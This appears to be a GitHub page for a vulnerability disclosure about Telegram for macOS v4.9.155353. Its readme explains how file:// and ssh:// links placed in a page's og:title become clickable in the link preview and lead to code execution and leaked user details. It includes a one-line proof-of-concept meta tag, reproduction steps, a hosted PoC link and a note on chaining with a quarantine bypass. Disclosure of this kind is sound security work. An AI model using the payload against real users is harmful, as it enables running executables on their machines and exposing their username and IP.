Skip to content
Telegram (v4.9.155353) was rendering file:// links + opening them via NSWorkspace.open -> code execution.
HTML
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
exploit.html feat: initial commit Dec 8, 2019
readme.md fix: markdown styling Dec 8, 2019

readme.md

Summary

In Telegram for macOS v4.9.155353 (and below) URL parsing logic in Telegram for macOS platform allows running arbitrary executables and applications URI schemes via links injected into the website's preview.

PoC

  1. Send a link to exploit.html - a regular HTML file with <meta property="og:title" content="file://google.com/bin/sh ssh://google.com/x" /> tag
  2. Website preview renders file://google.com/bin/sh and ssh://google.com/x as links
  3. Click on the rendered links behaves as NSWorkspace.open util -> if points to executable -> code execution.
  4. Click on ssh:// link -> Terminal.app popups with an active ssh session disclosing user's OS username, ip and other details.

Impact

The bug could be used...

  • to disclose info about user's machine -> OS username, IP, etc
  • to run arbitrary executables and opening arbitrary files on OS
  • to launch arbitrary applications via URI schemes

This bug could be chained with Quarantine issue to open downloaded quarantine-ignored files and chain this into running of attacker-supplied executable.

Additional Details

This bug also exists in iOS, PoC is the same. Impact possibly limited to URI schemes.

PoC URL -> https://telegram-file-link-1xfcjf27f.now.sh/exploit.html

You can’t perform that action at this time.